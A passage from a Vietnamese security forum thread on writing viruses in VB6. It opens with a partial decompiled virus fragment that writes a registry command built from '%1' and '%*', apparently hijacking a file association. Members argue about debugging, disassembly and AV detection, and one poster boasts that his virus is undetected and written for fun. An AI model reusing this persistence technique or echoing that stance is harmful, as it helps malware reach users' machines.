loc_0040CD66: var_4C = Chr(00000022h)
loc_0040CD71: var_000000B4 = "%1"
loc_0040CD7B: var_000000BC = 8
loc_0040CD85: var_0000008C = Chr(00000022h)
loc_0040CD9D: var_0000010C = 8
loc_0040CDB0: var_000000C4 = "%*"
loc_0040CDD5: call MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C)
loc_0040CDE3: call MSVBVM60.DLL.__vbaVarCat("", var_000000BC, MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C))
loc_0040CDF4: call MSVBVM60.DLL.__vbaVarCat("", var_0000008C, MSVBVM60.DLL.__vbaVarCat("", var_000000BC, MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C)))
loc_0040CE05: call MSVBVM60.DLL.__vbaVarCat("", 8, MSVBVM60.DLL.__vbaVarCat("", var_0000008C, MSVBVM60.DLL.__vbaVarCat("", var_000000BC, MSVBVM60.DLL.__vbaVarCat("", var_4C, var_5C))))
loc_0040CE51: call MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h)
loc_0040CE54: call MSVBVM60.DLL.__vbaLateMemCall(MSVBVM60.DLL.__vbaObjVar(esi+34h, "RegWrite", 00000003h))
loc_0040CE60: call MSVBVM60.DLL.__vbaFreeStr
loc_0040CE9B: GoTo loc_40CF06
loc_0040CF05: ret
loc_0040CF06: 'Referenced from 0040CE9B
loc_0040CF06: ret
loc_0040CF0D: call ecx+08h(arg_08)
loc_0040CF23: retn 0004h
End Sub
Bác nàm thí thì tạo công việc cho anh Quảng rồi,!
|
|
| Mọi câu hỏi vui lòng gửi lên diễn đàn! |
|
|
|
| [Question] Re: Viết virus = vb6.0 |
24/04/2008 21:20:32 (+0700) | #11 | 127299 |
|
thephatcompany
Member
|
|
0 |
|
|
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
|
|
| Làm sao để anh Quảng nhà ta phải suy nghĩ nhiều hơn, lúc này ảnh lo làm ăn không ah! Nhưng cũng tội ảnh bỏ ra hơn chục năm rùi còn gì? cho ảnh kiếm chút cơm đi mấy anh. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
24/04/2008 22:31:49 (+0700) | #12 | 127319 |
|
Look2Me
Member
|
|
0 |
|
|
Joined: 26/07/2006 23:30:57
Messages: 235
Location: Tủ quần nào
Offline
|
|
1. dễ gọi hàm hệ thống.
2. các chương trình diệt virus khó debug vì vb6.0 không trực tiếp truy cập các hàm API mà gọi thông qua MSVB60.DLL.
3. kích thước EXE nhỏ (không giống như MSVC++ quá cồng kềnh).
4. dễ viết.
Đúng với góc nhìn của bạn!
Hai năm nữa chắc chắn bạn sẽ nghĩ khác đi ở các điểm 1,2,3. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
27/04/2008 12:45:50 (+0700) | #13 | 127796 |
![[Avatar]](/hvaonline/images/avatar/3c3afec7ff9aab1ce0ba33e481a42a1d.jpg "[Avatar]")
|
VXer
Member
|
|
0 |
|
|
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
|
|
only1bit wrote:
Ai nghi ngờ VB6.0 thì add+ nick chát mình, cải nhau tay đôi.
VB6.0 Cực kì khó debug !
Mình sợ dạy bằng TASM32 các bạn không hiểu. Chuối khô dầu ạ. Đừng cho rằng mình giỏi hơn người ta nha.
Vãi 
Ai pro mấy cái virus này chỉ cho em với, virus là gì, worm là sao ... Em vào đây để được dạy đây ạ!! |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
28/04/2008 21:41:52 (+0700) | #14 | 127962 |
|
thephatcompany
Member
|
|
0 |
|
|
Joined: 27/02/2008 15:13:47
Messages: 453
Offline
|
|
| không hiểu????? vào đây để dạy hay học nữa. Tự mình học rồi tự mình dạy luôn! Ặc, tự cho là củ... gì chẳng biết nữa. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
28/04/2008 23:28:51 (+0700) | #15 | 127974 |
only1bit
Member
|
|
0 |
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Dear hacnho !
Theo bạn bạn hiểu bao nhiêu về đoạn code sau khi debug.
Bạn đang dùng chương trình debug chuyên biệt để debug mã virus của bọn mình.
Bạn nghĩ rằng BKAV có plugin hay EN nào có thể làm được đều này. Trong bàn toán tổng quát thì một virus được DASM trước để nhận diện. Theo mình biết cách nhận diện của BKAV khá cứng nhắc. Tiêu biểu cho việc này là bạn tải mã nguồn virus sau đó sửa lại là BKAV bó chiếu trong khi các AV khác thì xực liền. Thứ BKAV thiếu là tác nhân thông minh trong phân tích virus.
Xin thông báo là virus đó được viết cách đây 7 năm và đó chỉ là một thử nghiệm. Mặt khác bọn mình chưa anti debug. Bạn debug được chắc mừng lắm
Tới AUTOIT & VBS, JS, HTML, HTA,.... còn có thể viết virus VB6.0 tại sao lại không ? |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
28/04/2008 23:44:14 (+0700) | #16 | 127975 |
![[Avatar]](/hvaonline/images/avatar/089f41810321eefc3f4eef5d4a388e42.png "[Avatar]")
|
conmale
Administrator
|
Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
|
|
only1bit wrote:
Dear hacnho !
Theo bạn bạn hiểu bao nhiêu về đoạn code sau khi debug.
Bạn đang dùng chương trình debug chuyên biệt để debug mã virus của bọn mình.
Bạn nghĩ rằng BKAV có plugin hay EN nào có thể làm được đều này. Trong bàn toán tổng quát thì một virus được DASM trước để nhận diện. Theo mình biết cách nhận diện của BKAV khá cứng nhắc. Tiêu biểu cho việc này là bạn tải mã nguồn virus sau đó sửa lại là BKAV bó chiếu trong khi các AV khác thì xực liền. Thứ BKAV thiếu là tác nhân thông minh trong phân tích virus.
Xin thông báo là virus đó được viết cách đây 7 năm và đó chỉ là một thử nghiệm. Mặt khác bọn mình chưa anti debug. Bạn debug được chắc mừng lắm
Tới AUTOIT & VBS, JS, HTML, HTA,.... còn có thể viết virus VB6.0 tại sao lại không ?
Vậy bồ thử đăng lên cái nào mới hơn để bà con thưởng lãm vậy?  . Đừng đăng lên mấy cái cũ đến 7 năm làm chi.
to hacnho: debug được mấy cái vb cũ 7 năm có mừng hông em? |
|
| What bringing us together is stronger than what pulling us apart. |
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 05:09:56 (+0700) | #17 | 128013 |
|
hacnho
HVA Friend
|
Joined: 28/01/2003 12:07:45
Messages: 199
Location: OEP
Offline
|
|
Hì anh, em có debug đâu, thuận tay xem code chơi mà. Em nói thật đấy... Không tin anh hỏi VXer xem, em nàm trong 1' cái này, chắc ảnh chỉ nàm 15s !
Mình hem bít gì hít  , code bạn code vãi cả linh hồn thí nên mún xỉu òi ! BKAV mình không quan tâm lắm, mình xài máy không cài AV bạn à. Về mặt nguyên tắc thì AV nhận diện virus theo một đoạn mã nhị phân, hoặc một chuỗi string đặc trưng, hoặc một hành động khả nghi nào đó như hooking hệ thống, mở port, sử dụng một protocol nào đó. Nói chung khá nhiều trường hợp bạn à. Nếu thực sự bạn thích VB thì code anti debug 1 app hay virus nào đó đi, mình làm cho ! Nhưng cũng nói cho bạn rõ là HVA chỉ là nơi thảo luận, không phải là nơi mà bạn lên đây khoe tài vặt, rồi châm chọc nhau nhé. Mình có quyền mời bạn ra đấy.
Thân!
@VXer: dòm nick thấy quen quen  !
|
|
| Mọi câu hỏi vui lòng gửi lên diễn đàn! |
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 05:24:28 (+0700) | #18 | 128018 |
littleboy7984
Member
|
|
0 |
|
|
Joined: 18/05/2004 03:40:38
Messages: 2
Offline
|
|
only1bit wrote:
Dear hacnho !
Theo bạn bạn hiểu bao nhiêu về đoạn code sau khi debug.
Bạn đang dùng chương trình debug chuyên biệt để debug mã virus của bọn mình.
Bạn nghĩ rằng BKAV có plugin hay EN nào có thể làm được đều này. Trong bàn toán tổng quát thì một virus được DASM trước để nhận diện. Theo mình biết cách nhận diện của BKAV khá cứng nhắc. Tiêu biểu cho việc này là bạn tải mã nguồn virus sau đó sửa lại là BKAV bó chiếu trong khi các AV khác thì xực liền. Thứ BKAV thiếu là tác nhân thông minh trong phân tích virus.
Xin thông báo là virus đó được viết cách đây 7 năm và đó chỉ là một thử nghiệm. Mặt khác bọn mình chưa anti debug. Bạn debug được chắc mừng lắm
Tới AUTOIT & VBS, JS, HTML, HTA,.... còn có thể viết virus VB6.0 tại sao lại không ?
cách đây 7 năm mình có viết phần mềm bằng vb nhưng ko đc suy nghĩ "thông minh" như bạn, thời đó toàn xài win98, mỗi lần dùng phải cóp thêm file MSVBVM60.dll nặng 1MB 
còn viết virus bằng ngôn ngữ nào chả đc Viết bằng VB việc can thiệp vào hệ thống không dễ dàng bằng C++ nên ít người viết, nếu số lượng virus vb nhiều thì các antivirus sẽ để ý virus vb hơn, cũng thế cả thôi ...
lời cuối cho bạn: biết xây nhà chưa mà đòi phá ..  |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 05:34:04 (+0700) | #19 | 128019 |
![[Avatar]](/hvaonline/images/avatar/214e2f40f3b1da8657aa4e375db704ec.png "[Avatar]")
|
trickyboy
Member
|
|
0 |
|
|
Joined: 16/05/2005 04:11:45
Messages: 11
Offline
|
|
only1bit wrote:
Dear hacnho !
Theo bạn bạn hiểu bao nhiêu về đoạn code sau khi debug.
Bạn đang dùng chương trình debug chuyên biệt để debug mã virus của bọn mình.
Bạn nghĩ rằng BKAV có plugin hay EN nào có thể làm được đều này. Trong bàn toán tổng quát thì một virus được DASM trước để nhận diện. Theo mình biết cách nhận diện của BKAV khá cứng nhắc. Tiêu biểu cho việc này là bạn tải mã nguồn virus sau đó sửa lại là BKAV bó chiếu trong khi các AV khác thì xực liền. Thứ BKAV thiếu là tác nhân thông minh trong phân tích virus.
Xin thông báo là virus đó được viết cách đây 7 năm và đó chỉ là một thử nghiệm. Mặt khác bọn mình chưa anti debug. Bạn debug được chắc mừng lắm
Tới AUTOIT & VBS, JS, HTML, HTA,.... còn có thể viết virus VB6.0 tại sao lại không ?
Haizzz, bác nì liệu có biết phân biệt debug hay là dissamble ko nữa nhỉ? Cái đoạn anh nho show thì click chuột 1 phát nó ra hết thôi mừ, debug gì đâu. Không biết bạn tính antidebug cái gì ở đây nhỉ ) Có thì làm thử 1 cái anti cho anh em học hỏi nhen.
Còn virus sau 7 năm của bạn, giờ thành con gì rồi? cho anh em coi luôn đi |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 05:40:21 (+0700) | #20 | 128020 |
![[Avatar]](/hvaonline/images/avatar/6fcd9cf1b5c5cd6c0db2288dff1ae98a.jpg "[Avatar]")
|
kienmanowar
HVA Friend
|
Joined: 13/07/2004 05:57:34
Messages: 483
Offline
|
|
hihi tôi cũng ghét cái gì mà debug với disasm các chương trình code bằng VB lắm, nhưng nếu bạn có gì hay thì cứ cho anh em thử cái. Nhớ là chính tay mình code nhé, đừng "chôm" code của người khác nhét vào là được
Regards
|
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 05:46:05 (+0700) | #21 | 128021 |
|
hacnho
HVA Friend
|
Joined: 28/01/2003 12:07:45
Messages: 199
Location: OEP
Offline
|
|
Sặc, pà con REAOnline.net qua đây dữ vậy, 2 mod 1 ẹc min. Mẹ ơi . Hí hí, bây giờ mới để ý cái sign của lão kiên
Có những con người mới đôi ba tuổi đời.....
Cuộc sống mới bắt đầu đã cho rằng mình thấu hết ..
Làm được gì ? Và đã có gì ?
Chỉ học đòi thói chê bai.... Cần nhìn lại về chính thân mình ....
Hình hài chỉ là con số 0 ....... Hình hài chỉ là con số 0..... Con số 0..!!!
|
|
| Mọi câu hỏi vui lòng gửi lên diễn đàn! |
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 09:38:00 (+0700) | #22 | 128058 |
only1bit
Member
|
|
0 |
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Các bạn nghĩ mình thích khoe tài vặt sao !
Mình chỉ muốn viết một bài viết để chứng minh VB6.0 hoàn toàn có thể viết virus.Còn bạn nào giỏi hơn mình thì cứ việc mở box khác.
trickyboy
Bạn thân mến ! bạn có biết chương trình debug của windows là để dissamble một file exe không nhỉ. Tìm hiểu kỉ hơn nha bạn.
virus trên đây hoàn toàn mới ! vì sao ư !
Nó chưa bị bọn AV nhận diện. Bọn mình là nhóm viết virus vì mục đích giải trí không để phá.
Bạn nào có thể có được doạn mã trên bằng cách nhấn chuột phải thì cho mình xin cái chuột phải. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 09:41:27 (+0700) | #23 | 128059 |
only1bit
Member
|
|
0 |
|
|
Joined: 12/04/2008 21:15:03
Messages: 27
Offline
|
|
Mình viết virus này bằng VB6.0 nhưng qua mã nguồn của nó các bạn có thể viết lại dưới một ngôn ngử khác...Nếu không làm được việc này thì đừng nói là dân mê IT cho phí hai chử IT.
MOD làm ơn đóng dùm nha....
HVA có nhiều người tài giỏi quá nếu bạn nào cũng cảm thấy như vậy thì thôi.... |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 10:48:54 (+0700) | #24 | 128064 |
|
kienmanowar
HVA Friend
|
Joined: 13/07/2004 05:57:34
Messages: 483
Offline
|
|
Sao chưa gì đã đòi đóng topic lại nhỉ.. Lúc create nó thì rất hoành tráng giờ lại đòi đóng . Nếu như không có ai quan tâm thì tự bản thân topic này cũng sẽ chìm vào quên lãng thôi, cho nên cần gì phải nhờ đến Mod.
Con người ta nói được thì ít nhất phải có căn cứ, luận điểm để biến lời nói đó thành hành động, bạn cứ cho anh em ở đây xem cái có anti-debug hay anti-disasm gì gì đó đi. Tớ đừng ở ngoài học hỏi thôi!! |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 11:33:05 (+0700) | #25 | 128075 |
|
trickyboy
Member
|
|
0 |
|
|
Joined: 16/05/2005 04:11:45
Messages: 11
Offline
|
|
only1bit wrote:
Các bạn nghĩ mình thích khoe tài vặt sao !
Mình chỉ muốn viết một bài viết để chứng minh VB6.0 hoàn toàn có thể viết virus.Còn bạn nào giỏi hơn mình thì cứ việc mở box khác.
trickyboy
Bạn thân mến ! bạn có biết chương trình debug của windows là để dissamble một file exe không nhỉ. Tìm hiểu kỉ hơn nha bạn.
virus trên đây hoàn toàn mới ! vì sao ư !
Nó chưa bị bọn AV nhận diện. Bọn mình là nhóm viết virus vì mục đích giải trí không để phá.
Bạn nào có thể có được doạn mã trên bằng cách nhấn chuột phải thì cho mình xin cái chuột phải.
đúng là 1 chương trình debug thì có chức năng dissamble 1 file .exe. Nhưng cái đoạn code trên bị dissamble ra(hay nói đúng hơn là decompile về gần giống mã gốc) thì không nhất thiết phải qua chương trình debug nào cả. Nó được analyze tĩnh chứ ko phải trong lúc runtime thì dính dáng gì đến debug hả bạn ?Do đó nếu bạn code antidebug... thì để anti cái gì? Chắc kiến thức của bạn về 2 chữ debug nó nằm ở 1 tầng siêu cao nào quá nên ko hợp cách hiểu thấp bé của tui, xin lỗi bạn nhiều hen. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 11:56:24 (+0700) | #26 | 128081 |
Bạn thân mến ! bạn có biết chương trình debug của windows là để dissamble một file exe không nhỉ. Tìm hiểu kỉ hơn nha bạn.
Linh tinh lăng nhăng WinDBG hoặc Olly hoặc bất kỳ debugger cấp thấp nào khác đều phải có disassembler nhằm phục vụ mục đích chính là trace theo instruction, chứ ko phải là để mỗi mục đích disassemble file exe.
VB6 là ngôn ngữ và bộ dịch để phục vụ cho các chương trình đơn giản, dành cho các programmer xây dựng soft theo kiểu RAD, tính tương tác với system thấp. Hiệu năng sử dụng của VB6 so với các ngôn ngữ hệ thống khác như C, Delphi còn kém nhiều về mức độ gọn nhẹ, tốc độ. Lý do chính là mã VB6 thực chất khi compiled ra sẽ thành 1 dạng virtual machine code (hay gọi là p-code) mà không phải native code (phổ biến nhất là x86/64 instruction code), không thể dùng để tương tác sâu với hệ thống (đơn giản nhất như asm inline hoặc tương tác địa chỉ, ô nhớ.. )
Dùng VB6 với mục đích học tập hoặc nghiên cứu các vấn để đơn giản như nhập môn lập trình thì tốt, còn dùng để lập trình hệ thống, virus, vv ... nói chung là không hiệu quả và người chuyên nghiệp ko ai dùng VB để viết những thứ như vậy.
Mời bạn only1bit ghé qua các diễn đàn RE như reaonline.net, exetools, SeekNDestroy, UnpackCN .. tìm hiểu thêm. |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
29/04/2008 12:27:50 (+0700) | #27 | 128086 |
|
VXer
Member
|
|
0 |
|
|
Joined: 20/12/2007 10:22:40
Messages: 44
Offline
|
|
@hacnho: Em dùng nick này trong vài diễn đàn, nhưng chắc bác không quen em đâu . Mà máy em còn mấy tut RE của bác, xét về kinh nghiệm và trình độ em kém bác nhiều lém
@Only1bit: Hâm mộ bác quá, cách đây 7 năm em còn chửa biết máy tính là gì  |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
30/04/2008 00:11:13 (+0700) | #28 | 128156 |
Dì Tư
Member
|
|
0 |
|
|
Joined: 24/03/2008 11:21:31
Messages: 3
Offline
|
|
| Theo như quan sát thì những đồng chí đại loại như bác only1bit hay bác reverser gì đấy (trong topic unpack ASPack) ... sau một hồi bị các bác REA Staff dí sẽ tự động lặn mất |
|
|
|
|
| [Question] Re: Viết virus = vb6.0 |
30/04/2008 02:23:09 (+0700) | #29 | 128180 |
vuadapass
Member
|
|
0 |
|
|
Joined: 24/08/2006 21:52:13
Messages: 23
Offline
|
|
Hiệu năng sử dụng của VB6 so với các ngôn ngữ hệ thống khác như C, Delphi còn kém nhiều về mức độ gọn nhẹ, tốc độ
vb6 chạy code bằng cách sử dụng một DLL MSVB, khi được gọi sẽ nhảy tới code được chỉ định trong tiến trình của mình (form_load, command, textbox .... ). Nên đơn giản mà nói nó trace qua các dòng code hơi lòng vòng và chậm chạp. Nhưng với tốc độ phát triển của cntt như hiện nay thì chuyện đó không thành vần đề, có chăng thì mọi người chỉ nói 10 năm trước, khi máy tính chỉ có 0,5 Ghz . Còn bây giờ, nó đã gấp trước X10 lần với tốc độ "hàng triệu phép tính trên giây".
Dùng VB6 với mục đích học tập hoặc nghiên cứu các vấn để đơn giản như nhập môn lập trình thì tốt, còn dùng để lập trình hệ thống, virus, vv ... nói chung là không hiệu quả và người chuyên nghiệp ko ai dùng VB để viết những thứ như vậy.
phải chăng anh đang nói theo cách khách quan của riêng anh ? anh thử lấy một ví dụ về lập trình hệ thống hay virus mà so với các ngôn ngữ khác VB6 không làm được xem . Em thấy vấn đề chủ yếu là giải pháp, cách thức của người lập trình. Mình có thể viết ra hai soft giống nhau từ 2 ngôn ngữ khác nhau chỉ cần có cách thứ ....
Còn về chuyện viết virus bằng VB, điều đó là khá bình thường. ta có thể viết ứng dụng phá hoại nếu ta muốn phá hoại |
|
|
|
|
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
Thảo luận virus, trojan, spyware, worm...
![[Profile]](/hvaonline/templates/viet/images/en_US/icon_profile.gif "[Profile]"){kind=icon}
![[PM]](/hvaonline/templates/viet/images/en_US/icon_pm.gif "[PM]"){kind=icon}
![[Up]](/hvaonline/templates/viet/images/en_US/icon_up.gif "[Up]"){kind=icon}
![[Print Copy]](/hvaonline/templates/viet/images/en_US/icon_print.gif "[Print Copy]"){kind=icon}
![[WWW]](/hvaonline/templates/viet/images/icon_www.gif "[www]"){kind=icon}
![[Yahoo!]](/hvaonline/templates/viet/images/icon_yim.gif "[YIM]"){kind=icon}
![[Avatar]](/hvaonline/images/avatar/bb9fff0454556af767c59269997fb352.jpg "[Avatar]")
![[digg]](/hvaonline/templates/viet/images/digg.gif "[digg]")
![[delicious]](/hvaonline/templates/viet/images/delicious.gif "[delicious]")
![[google]](/hvaonline/templates/viet/images/google.gif "[google]")
![[yahoo]](/hvaonline/templates/viet/images/yahoo.gif "[yahoo]")
![[technorati]](/hvaonline/templates/viet/images/technorati.gif "[technorati]")
![[reddit]](/hvaonline/templates/viet/images/reddit.gif "[reddit]")
![[stumbleupon]](/hvaonline/templates/viet/images/stumbleupon.gif "[stumbleupon]")